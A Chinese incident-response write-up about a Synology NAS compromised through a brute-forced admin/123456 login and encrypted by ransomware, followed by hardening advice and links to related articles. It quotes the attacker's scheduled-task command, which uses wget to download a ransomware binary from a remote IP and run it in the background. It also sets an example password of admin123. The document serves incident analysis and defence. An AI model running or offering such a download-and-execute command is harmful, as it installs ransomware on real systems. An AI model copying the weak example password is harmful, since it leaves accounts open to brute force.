一次群晖中勒索病毒后的应急响应
群晖是一种NAS(网络附属存储)系统,在生活中主要扮演个人私有云角色,可以将文件存储于 NAS,并通过网页浏览器或手机应用程序可实现存储和共享,同时还提供的丰富应用以方便管理应用。借助群晖提供的 QuickConnect 快连服务,无需随身携带存储设备,即可以随时随地访问NAS。因为这些优点,群晖往往被当做是NAS的首选。
但偏偏这次被上勒索病毒了,通过资料查询发现该病毒早在2019年安全专家就已经分析过并已提供预警信息,一旦感染,其中的文件都会被加密,并通过留下的文件索要比特币。经过初步判断是通过web界面的弱口令进去的,之后创建了一个定时任务从美国某个IP下载文件来执行命令,并通过勒索病毒对文件进行了加密且暂时未发现该病毒有横向行动。本文主要记录群晖中勒索病毒后的应急响应过程。
一、攻击流程
(一)获取攻击目标
目标地址为http://x.x.x.x:5000,根据资料查询群晖的默认端口就是5000和5001,那么黑客应该是有针对性地通过批量扫描对公网上的IP地址的5000以及5001端口进行检测,如果扫描到为群晖系统,那么就记录下来保存结果
(二)实施弱口令爆破
通过工具对目标站点的默认管理账号admin进行爆破,通过admin/123456爆破进入群晖NAS系统,并且黑客采取了动态切换代理IP的方式来提升我们的溯源难度。
(三)植入勒索病毒
以admin登录后便植入了勒索病毒,加密硬盘数据(文件类型为encrypt)并留下了比特币支付地址。
二、应急流程
目标群晖系统版本的DSM为6.2.3-25426,CPU为INTEL Celeron J3455,在公网上没有已知漏洞存在能够直接进入目标。
(一)修改密码
既然知道了入侵源头,那么先把弱口令修改掉,防止黑客再次通过弱口令登录,可以通过web系统界面或服务器这两种方式进行修改
(1)直接修改密码
将密码修改为强口令,最好启用2步骤验证来提高安全性
(2)在服务器中修改
1、在web界面开启22端口
2、通过ssh登录目标群晖的admin账户(admin为群晖的默认账户)
3、输入以下命令,直接切换为root权限
sudo su -
4、输入以下命令,修改密码为admin123
synouser --setpw admin admin123
(二)日志分析
根据受害公司的反馈,他们是从7月29日发现文件被加密,而到了8月3日才寻求技术帮助,那么通过群晖自带的日志中心可以发现在7月28日晚上11点19分有来自83.97.20.103通过登录admin账号
当然溯源这个IP并没有什么卵用,因为是海外并已被标记为代理、扫描地址
通过日志查询还发现攻击者在7月28日19分还创建了定时任务
执行的具体命令如下,主要功能是进入/tmp目录下将crp_linux_386文件下载下来并赋予777权限输出为386,通过nohub永久执行386程序且不输出任何信息到终端
cd /tmp && wget --no-check-certificate -O 386 http://98.144.56.47/1/crp_linux_386;chmod 0777 ./386;nohub ./386 --syno=true </dev/null> /dev/null 2>&1 &
在微步上查询98.144.56.47,发现已标识为勒索程序,数据解密的希望已经十分渺茫
(三)病毒查杀
首先先将tmp目录下的386文件删除(但是未保存病毒原件,不能仔细分析该病毒,比较可惜),之后主要通过群晖自带的插件Antivirus Essential查看在群晖中是否留有病毒
(1)下载Antivirus Essential
(2)全盘扫描
(3)隔离病毒
(四)数据解密
这个太有意思了,在第一天访谈之后,老板去找了淘宝上的店家破解,我一开始以为淘宝的店家真的那么牛,这种加密的数据都能破解,后来访问了暗网的地址才发现,淘宝店家直接出钱买了解密工具,直接净赚xxxx元。
复制一个加密文件通过下载的解密程序尝试进行解密,最后成功解密。解密过程如下:
.\decryptor_windows_x86.exe -s C:\test\
三、防范方法
1、停用默认管理账号admin,新建一个不同的账号并分配管理权限
2、杜绝弱口令,设置强口令,可参考等保要求中的长度八位以上,由数字、字母、特殊字符构成
3、修改默认登录端口,可修改如10000+以上的端口
4、开启登录失败锁定,对多次登录失败的IP进行锁定
5、安装安全工具(安全顾问),定期更新补丁并升级版本
6、启用防火墙,配置出入规则
7、文件版本回滚,能轻松将文件还原至感染前的状态,可以有效防止因感染勒索病毒后文件无法访问的情况
8、文件权限控制,在分享文件时设置访问密码、有效期等,并对文件权限进行控制
一次群晖中勒索病毒后的应急响应相关推荐
- 中勒索病毒后的正确操作姿势
中毒后正确的操作步骤整体概括如上图.我们接下来详细解说每一步 1.1 数据不重要 若属于这种情况那么恭喜你侥幸躲过一劫,但别得意的太早,因为如果你对安全时间不加以重视,那么迟早有一天你的重要数据会被加 ...
- Windows Server 2012 R2 安装完勒索病毒后出现的共享和DNS等问题
勒索病毒带来的恐慌,相信大家有目共睹了.我也不例外,虽然没有给我们公司带来什么破坏,但是有补丁还是得打一下! 本公司没有安装网络版的杀毒软件,全部安装单机版杀毒软件,腾讯安全管家,360安全助手,36 ...
- v5系列服务器后面板不存在以下哪款指示,群晖RS10613xs+ NAS服务器后面板简介
群晖RS10613xs+ NAS服务器后面板简介 群晖RS10613xs+ NAS服务器后面板简介: NAS服务器的后面板往往承担着数据的输入.输出,电影的输入,网络的传输,容量的扩展,电能的支持以及 ...
- oracle中毒,oracle数据库中毒恢复 oracle数据库解密恢复 服务器中勒索病毒解密恢复.Hermes666...
oracle数据库中毒恢复 oracle数据库解密恢复 服务器中勒索病毒解密恢复.Hermes666 客户名称 保密 数据类型 oracle 11G 数据容量 100 gb 故障类型 服务器中毒,文件 ...
- 服务器中勒索病毒解密恢复 SQL数据库中勒索病毒解密恢复 SQL数据库被加密恢复...
服务器中勒索病毒解密恢复 SQL数据库中勒索病毒解密恢复 SQL数据库被加密恢复 前天接到一位客户求救 说几台服务器都中招了,这个也很常见了.客户发来加密的MDF后,我们使用数据库修复软件 任何一款 ...
- 使用Linux还原存储在群晖中的数据
前段时间在自己的小主机上面安装了DiskStation6.1,装好后把一些资料放进去之后,一直没有使用,最近这一段时间打算把所有的资料都整理一下,开启虚拟机之后发现DiskStation6.1已经无法 ...
- 群晖自动删除重复文件_在群晖中批量删除重复文件(零基础手把手图文)
在群晖中批量删除重复文件(零基础手把手图文) 2020-03-26 14:51:01 24点赞 229收藏 39评论 小编注:此篇文章来自即可瓜分10万金币,周边好礼达标就有,邀新任务奖励无上限,点击 ...
- 群晖|半洗白后moments正常显示人像、主题、预览
Moments不工作 群晖重装6.2.3之后,发现moments不能正常工作了,不管是人物还是主题都是空白,还会显示有XXX张照片待发现,但会停在这儿. 这如何能忍,网络上找到替换文件大法,没啥用,这 ...
- 黑群晖二合一已损毁_搬运 如何在黑群晖中重置损毁的储存池/储存空间
本帖最后由 ieweix 于 2020-11-23 22:05 编辑 如何在黑群晖中重置损毁的储存池/储存空间 萌新请不要看这个教程! 这个教程合适对linux有一定基础的用户 使用本方法前,请备份E ...
最新文章
- c++ 负数比较大小_负数的定义(二)
- python bs4 安装_Python安装Bs4的多种方法
- [c++]引入了头文件和动态库,为什么找不到函数实现
- Luogu P1073 最优贸易【最短路/建反图】 By cellur925
- oracle查看创建索引语句,ORACLE下如何获得全部的索引创建语句
- java 单元测试技巧_其他一些单元测试技巧
- 为什么BDLocationListener没有被调用
- Linux的i2c驱动详解
- 博文视点大讲堂第44期——招聘真相全揭秘 圆满结束
- delphi压缩后使用http协议base64上传下载6G超大文件
- segue跳转_使用SwiftUI的Segue Shenanigans
- Java实现房屋租赁网站
- 查询用户活跃度表登录间隔30天的用户
- 感恩,生命的馈赠(2014年终总结)
- python使用pip命令自动下载安装库
- R语言之Rstudio 导入包
- 模拟买一台计算机及装机心得,装机模拟器显卡及处理器超频影响因素分析 超频体验心得_游侠网...
- linux 普通用户修改密码
- Zabbix+分布式数据库TiDB实现分布式数据库监控
- 趣图:六层网络协议的消息传递
热门文章
- CV:计算机视觉技术之图像基础知识(二)—图像内核的可视化解释
- Ubuntu20.04中安装shutter
- 朴素贝叶斯分类器(Navie Bayesian Classifier)中的几个要点(一)
- 函数中返回char *类型
- 前端基础-jQuery的事件的用法
- android学习笔记Fragment的使用
- 模块修改-column_left.php
- STM32F103单片机系统时钟部分归纳
- st-link和jlink调试stm32接线注意事项
- yzmcms图片自适应代码_[ NeurIPS 2020 ] 一叶知秋 —— 基于“单目标域样本”的领域自适应方法...